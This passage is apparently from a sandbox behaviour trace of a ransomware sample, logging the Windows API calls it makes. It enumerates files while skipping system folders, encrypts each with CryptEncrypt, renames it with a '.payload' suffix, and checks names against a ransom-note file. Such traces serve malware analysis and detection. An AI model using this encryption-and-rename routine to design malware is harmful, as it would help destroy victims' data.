Size=0x2800) returned 0x6432a0 [0061.760] ReadFile (in: hFile=0x430, lpBuffer=0x6432a0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x6432a0*, lpNumberOfBytesRead=0x342fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0061.774] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0061.775] WriteFile (in: hFile=0x430, lpBuffer=0x6432a0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x6432a0*, lpNumberOfBytesWritten=0x342fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0061.775] GetProcessHeap () returned 0x5e0000 [0061.775] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x6432a0 | out: hHeap=0x5e0000) returned 1 [0061.775] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.775] WriteFile (in: hFile=0x430, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342fa6c*=0x300, lpOverlapped=0x0) returned 1 [0062.394] WriteFile (in: hFile=0x430, lpBuffer=0x342f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x342f9b8*, lpNumberOfBytesWritten=0x342fa6c*=0x80, lpOverlapped=0x0) returned 1 [0062.394] WriteFile (in: hFile=0x430, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342fa6c*=0x4, lpOverlapped=0x0) returned 1 [0062.394] CloseHandle (hObject=0x430) returned 1 [0062.924] GetProcessHeap () returned 0x5e0000 [0062.924] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x60fc68 [0062.924] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended.mzz_r00t_{nhhHyu}.payload") returned 66 [0062.924] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended.mzz" (normalized: "c:\\588bce7c90097ed212\\netfx_extended.mzz"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended.mzz_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\netfx_extended.mzz_r00t_{nhhhyu}.payload")) returned 1 [0062.925] GetProcessHeap () returned 0x5e0000 [0062.925] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x60fc68 | out: hHeap=0x5e0000) returned 1 [0062.925] FindNextFileW (in: hFindFile=0x606be0, lpFindFileData=0x342faa8 | out: lpFindFileData=0x342faa8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x2dbe0800, ftCreationTime.dwHighDateTime=0x1cac6fb, ftLastAccessTime.dwLowDateTime=0x2dbe0800, ftLastAccessTime.dwHighDateTime=0x1cac6fb, ftLastWriteTime.dwLowDateTime=0x2dbe0800, ftLastWriteTime.dwHighDateTime=0x1cac6fb, nFileSizeHigh=0x0, nFileSizeLow=0xd5000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="netfx_Extended_x64.msi", cAlternateFileName="NETFX_~3.MSI")) returned 1 [0062.925] lstrcmpiW (lpString1="netfx_Extended_x64.msi", lpString2="Windows") returned -1 [0062.925] lstrcmpiW (lpString1="netfx_Extended_x64.msi", lpString2="$Recycle.bin") returned 1 [0062.925] lstrcmpiW (lpString1="netfx_Extended_x64.msi", lpString2="System Volume Information") returned -1 [0062.925] lstrcmpiW (lpString1="netfx_Extended_x64.msi", lpString2="Program Files") returned -1 [0062.925] lstrcmpiW (lpString1="netfx_Extended_x64.msi", lpString2="Program Files (x86)") returned -1 [0062.925] wnsprintfW (in: pszDest=0x624df8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended_x64.msi") returned 48 [0062.925] StrStrIW (lpFirst="netfx_Extended_x64.msi", lpSrch=".payload") returned 0x0 [0062.925] lstrcmpW (lpString1="netfx_Extended_x64.msi", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0062.925] lstrcmpW (lpString1="netfx_Extended_x64.msi", lpString2="taridd") returned -1 [0062.925] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended_x64.msi", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0062.925] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended_x64.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_extended_x64.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0062.926] GetTickCount () returned 0x115024e [0062.926] GetTickCount () returned 0x115024e [0062.926] GetTickCount () returned 0x115024e [0062.926] GetTickCount () returned 0x115024e [0062.926] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f9b8*, pdwDataLen=0x342fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x342f9b8*, pdwDataLen=0x342fa68*=0x80) returned 1 [0062.926] GetProcessHeap () returned 0x5e0000 [0062.926] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x6432a0 [0062.926] ReadFile (in: hFile=0x430, lpBuffer=0x6432a0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x6432a0*, lpNumberOfBytesRead=0x342fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0062.928] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0062.928] WriteFile (in: hFile=0x430, lpBuffer=0x6432a0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x6432a0*, lpNumberOfBytesWritten=0x342fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0062.928] GetProcessHeap () returned 0x5e0000 [0062.928] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x6432a0 | out: hHeap=0x5e0000) returned 1 [0062.928] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0062.928] WriteFile (in: hFile=0x430, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342fa6c*=0x300, lpOverlapped=0x0) returned 1 [0062.929] WriteFile (in: hFile=0x430, lpBuffer=0x342f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x342f9b8*, lpNumberOfBytesWritten=0x342fa6c*=0x80, lpOverlapped=0x0) returned 1 [0062.929] WriteFile (in: hFile=0x430, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342fa6c*=0x4, lpOverlapped=0x0) returned 1 [0062.929] CloseHandle (hObject=0x430) returned 1 [0062.950] GetProcessHeap () returned 0x5e0000 [0062.950] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x60fc68 [0062.950] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended_x64.msi_r00t_{nhhHyu}.payload") returned 70 [0062.950] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended_x64.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_extended_x64.msi"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended_x64.msi_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\netfx_extended_x64.msi_r00t_{nhhhyu}.payload")) returned 1 [0062.951] GetProcessHeap () returned 0x5e0000 [0062.951] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x60fc68 | out: hHeap=0x5e0000) returned 1 [0062.951] FindNextFileW (in: hFindFile=0x606be0, lpFindFileData=0x342faa8 | out: lpFindFileData=0x342faa8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x7626f700, ftCreationTime.dwHighDateTime=0x1cac6f6, ftLastAccessTime.dwLowDateTime=0x7626f700, ftLastAccessTime.dwHighDateTime=0x1cac6f6, ftLastWriteTime.dwLowDateTime=0x7626f700, ftLastWriteTime.dwHighDateTime=0x1cac6f6, nFileSizeHigh=0x0, nFileSizeLow=0x79000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="netfx_Extended_x86.msi", cAlternateFileName="NETFX_~4.MSI")) returned 1 [0062.951] lstrcmpiW (lpString1="netfx_Extended_x86.msi", lpString2="Windows") returned -1 [0062.951] lstrcmpiW (lpString1="netfx_Extended_x86.msi", lpString2="$Recycle.bin") returned 1 [0062.951] lstrcmpiW (lpString1="netfx_Extended_x86.msi", lpString2="System Volume Information") returned -1 [0062.951] lstrcmpiW (lpString1="netfx_Extended_x86.msi", lpString2="Program Files") returned -1 [0062.951] lstrcmpiW (lpString1="netfx_Extended_x86.msi", lpString2="Program Files (x86)") returned -1 [0062.951] wnsprintfW (in: pszDest=0x624df8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended_x86.msi") returned 48 [0062.951] StrStrIW (lpFirst="netfx_Extended_x86.msi", lpSrch=".payload") returned 0x0 [0062.951] lstrcmpW (lpString1="netfx_Extended_x86.msi", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0062.951] lstrcmpW (lpString1="netfx_Extended_x86.msi", lpString2="taridd") returned -1 [0062.951] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended_x86.msi", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0062.952] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended_x86.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_extended_x86.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0062.952] GetTickCount () returned 0x115026d [0062.952] GetTickCount () returned 0x115026d [0062.952] GetTickCount () returned 0x115026d [0062.952] GetTickCount () returned 0x115026d [0062.952] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f9b8*, pdwDataLen=0x342fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x342f9b8*, pdwDataLen=0x342fa68*=0x80) returned 1 [0062.952] GetProcessHeap () returned 0x5e0000 [0062.952] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x6432a0 [0062.952] ReadFile (in: hFile=0x430, lpBuffer=0x6432a0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x6432a0*, lpNumberOfBytesRead=0x342fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0062.954] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0062.954] WriteFile (in: hFile=0x430, lpBuffer=0x6432a0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x6432a0*, lpNumberOfBytesWritten=0x342fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0062.954] GetProcessHeap () returned 0x5e0000 [0062.954] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x6432a0 | out: hHeap=0x5e0000) returned 1 [0062.954] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0062.954] WriteFile (in: hFile=0x430, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342fa6c*=0x300, lpOverlapped=0x0) returned 1 [0062.955] WriteFile (in: hFile=0x430, lpBuffer=0x342f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x342f9b8*, lpNumberOfBytesWritten=0x342fa6c*=0x80, lpOverlapped=0x0) returned 1 [0062.955] WriteFile (in: hFile=0x430, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342fa6c*=0x4, lpOverlapped=0x0) returned 1 [0062.955] CloseHandle (hObject=0x430) returned 1 [0063.135] GetProcessHeap () returned 0x5e0000 [0063.135] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x60fc68 [0063.135] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended_x86.msi_r00t_{nhhHyu}.payload") returned 70 [0063.135] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended_x86.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_extended_x86.msi"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended_x86.msi_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\netfx_extended_x86.msi_r00t_{nhhhyu}.payload")) returned 1 [0063.136] GetProcessHeap () returned 0x5e0000 [0063.136] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x60fc68 | out: hHeap=0x5e0000) returned 1 [0063.136] FindNextFileW (in: hFindFile=0x606be0, lpFindFileData=0x342faa8 | out: lpFindFileData=0x342faa8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x4a0f7400, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x4a0f7400, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x4a0f7400, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x426ae, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="ParameterInfo.xml", cAlternateFileName="PARAME~1.XML")) returned 1 [0063.136] lstrcmpiW (lpString1="ParameterInfo.xml", lpString2="Windows") returned -1 [0063.136] lstrcmpiW (lpString1="ParameterInfo.xml", lpString2="$Recycle.bin") returned 1 [0063.136] lstrcmpiW (lpString1="ParameterInfo.xml", lpString2="System Volume Information") returned -1 [0063.136] lstrcmpiW (lpString1="ParameterInfo.xml", lpString2="Program Files") returned -1 [0063.136] lstrcmpiW (lpString1="ParameterInfo.xml", lpString2="Program Files (x86)") returned -1 [0063.136] wnsprintfW (in: pszDest=0x624df8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\ParameterInfo.xml") returned 43 [0063.136] StrStrIW (lpFirst="ParameterInfo.xml", lpSrch=".payload") returned 0x0 [0063.136] lstrcmpW (lpString1="ParameterInfo.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0063.136] lstrcmpW (lpString1="ParameterInfo.xml", lpString2="taridd") returned -1 [0063.136] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\ParameterInfo.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0063.136] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\ParameterInfo.xml" (normalized: "c:\\588bce7c90097ed212\\parameterinfo.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0063.137] GetTickCount () returned 0x1150329 [0063.137] GetTickCount () returned 0x1150329 [0063.137] GetTickCount () returned 0x1150329 [0063.137] GetTickCount () returned 0x1150329 [0063.137] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f9b8*, pdwDataLen=0x342fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x342f9b8*, pdwDataLen=0x342fa68*=0x80) returned 1 [0063.137] GetProcessHeap () returned 0x5e0000 [0063.137] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x6432a0 [0063.137] ReadFile (in: hFile=0x430, lpBuffer=0x6432a0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x6432a0*, lpNumberOfBytesRead=0x342fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0063.140] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0063.140] WriteFile (in: hFile=0x430, lpBuffer=0x6432a0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x6432a0*, lpNumberOfBytesWritten=0x342fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0063.141] GetProcessHeap () returned 0x5e0000 [0063.141] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x6432a0 | out: hHeap=0x5e0000) returned 1 [0063.141] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0063.141] WriteFile (in: hFile=0x430, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342fa6c*=0x300, lpOverlapped=0x0) returned 1 [0063.144] WriteFile (in: hFile=0x430, lpBuffer=0x342f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x342f9b8*, lpNumberOfBytesWritten=0x342fa6c*=0x80, lpOverlapped=0x0) returned 1 [0063.144] WriteFile (in: hFile=0x430, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342fa6c*=0x4, lpOverlapped=0x0) returned 1 [0063.144] CloseHandle (hObject=0x430) returned 1 [0063.151] GetProcessHeap () returned 0x5e0000 [0063.151] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x60fc68 [0063.151] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\ParameterInfo.xml_r00t_{nhhHyu}.payload") returned 65 [0063.151] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\ParameterInfo.xml" (normalized: "c:\\588bce7c90097ed212\\parameterinfo.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\ParameterInfo.xml_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\parameterinfo.xml_r00t_{nhhhyu}.payload")) returned 1 [0063.158] GetProcessHeap () returned 0x5e0000 [0063.158] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x60fc68 | out: hHeap=0x5e0000) returned 1 [0063.158] FindNextFileW (in: hFindFile=0x606be0, lpFindFileData=0x342faa8 | out: lpFindFileData=0x342faa8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x19dedd00, ftCreationTime.dwHighDateTime=0x1ca2a1b, ftLastAccessTime.dwLowDateTime=0x19dedd00, ftLastAccessTime.dwHighDateTime=0x1ca2a1b, ftLastWriteTime.dwLowDateTime=0x19dedd00, ftLastWriteTime.dwHighDateTime=0x1ca2a1b, nFileSizeHigh=0x0, nFileSizeLow=0x2d200, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="RGB9RAST_x64.msi", cAlternateFileName="RGB9RA~1.MSI")) returned 1 [0063.158] lstrcmpiW (lpString1="RGB9RAST_x64.msi", lpString2="Windows") returned -1 [0063.158] lstrcmpiW (lpString1="RGB9RAST_x64.msi", lpString2="$Recycle.bin") returned 1 [0063.158] lstrcmpiW (lpString1="RGB9RAST_x64.msi", lpString2="System Volume Information") returned -1 [0063.158] lstrcmpiW (lpString1="RGB9RAST_x64.msi", lpString2="Program Files") returned 1 [0063.158] lstrcmpiW (lpString1="RGB9RAST_x64.msi", lpString2="Program Files (x86)") returned 1 [0063.158] wnsprintfW (in: pszDest=0x624df8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\RGB9RAST_x64.msi") returned 42 [0063.158] StrStrIW (lpFirst="RGB9RAST_x64.msi", lpSrch=".payload") returned 0x0 [0063.158] lstrcmpW (lpString1="RGB9RAST_x64.msi", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0063.158] lstrcmpW (lpString1="RGB9RAST_x64.msi", lpString2="taridd") returned -1 [0063.158] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\RGB9RAST_x64.msi", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0063.158] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\RGB9RAST_x64.msi" (normalized: "c:\\588bce7c90097ed212\\rgb9rast_x64.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0063.159] GetTickCount () returned 0x1150338 [0063.159] GetTickCount () returned 0x1150338 [0063.159] GetTickCount () returned 0x1150338 [0063.159] GetTickCount () returned 0x1150338 [0063.159] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f9b8*, pdwDataLen=0x342fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x342f9b8*, pdwDataLen=0x342fa68*=0x80) returned 1 [0063.159] GetProcessHeap () returned 0x5e0000 [0063.159] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x6432a0 [0063.159] ReadFile (in: hFile=0x430, lpBuffer=0x6432a0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x6432a0*, lpNumberOfBytesRead=0x342fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0063.161] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0063.161] WriteFile (in: hFile=0x430, lpBuffer=0x6432a0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x6432a0*, lpNumberOfBytesWritten=0x342fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0063.161] GetProcessHeap () returned 0x5e0000 [0063.161] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x6432a0 | out: hHeap=0x5e0000) returned 1 [0063.161] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0063.161] WriteFile (in: hFile=0x430, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342fa6c*=0x300, lpOverlapped=0x0) returned 1 [0063.162] WriteFile (in: hFile=0x430, lpBuffer=0x342f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x342f9b8*, lpNumberOfBytesWritten=0x342fa6c*=0x80, lpOverlapped=0x0) returned 1 [0063.162] WriteFile (in: hFile=0x430, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342fa6c*=0x4, lpOverlapped=0x0) returned 1 [0063.162] CloseHandle (hObject=0x430) returned 1 [0063.167] GetProcessHeap () returned 0x5e0000 [0063.167] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x60fc68 [0063.167] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\RGB9RAST_x64.msi_r00t_{nhhHyu}.payload") returned 64 [0063.167] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\RGB9RAST_x64.msi" (normalized: "c:\\588bce7c90097ed212\\rgb9rast_x64.msi"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\RGB9RAST_x64.msi_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\rgb9rast_x64.msi_r00t_{nhhhyu}.payload")) returned 1 [0063.168] GetProcessHeap () returned 0x5e0000 [0063.168] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x60fc68 | out: hHeap=0x5e0000) returned 1 [0063.168] FindNextFileW (in: hFindFile=0x606be0, lpFindFileData=0x342faa8 | out: lpFindFileData=0x342faa8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x177c8300, ftCreationTime.dwHighDateTime=0x1ca2a1b, ftLastAccessTime.dwLowDateTime=0x177c8300, ftLastAccessTime.dwHighDateTime=0x1ca2a1b, ftLastWriteTime.dwLowDateTime=0x177c8300, ftLastWriteTime.dwHighDateTime=0x1ca2a1b, nFileSizeHigh=0x0, nFileSizeLow=0x17200, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="RGB9Rast_x86.msi", cAlternateFileName="RGB9RA~2.MSI")) returned 1 [0063.168] lstrcmpiW (lpString1="RGB9Rast_x86.msi", lpString2="Windows") returned -1 [0063.168] lstrcmpiW (lpString1="RGB9Rast_x86.msi", lpString2="$Recycle.bin") returned 1 [0063.168] lstrcmpiW (lpString1="RGB9Rast_x86.msi", lpString2="System Volume Information") returned -1 [0063.168] lstrcmpiW (lpString1="RGB9Rast_x86.msi", lpString2="Program Files") returned 1 [0063.168] lstrcmpiW (lpString1="RGB9Rast_x86.msi", lpString2="Program Files (x86)") returned 1 [0063.168] wnsprintfW (in: pszDest=0x624df8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\RGB9Rast_x86.msi") returned 42 [0063.168] StrStrIW (lpFirst="RGB9Rast_x86.msi", lpSrch=".payload") returned 0x0 [0063.168] lstrcmpW (lpString1="RGB9Rast_x86.msi", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0063.168] lstrcmpW (lpString1="RGB9Rast_x86.msi", lpString2="taridd") returned -1 [0063.168] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\RGB9Rast_x86.msi", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0063.168] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\RGB9Rast_x86.msi" (normalized: "c:\\588bce7c90097ed212\\rgb9rast_x86.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0063.169] GetTickCount () returned 0x1150348 [0063.169] GetTickCount () returned 0x1150348 [0063.169] GetTickCount () returned 0x1150348 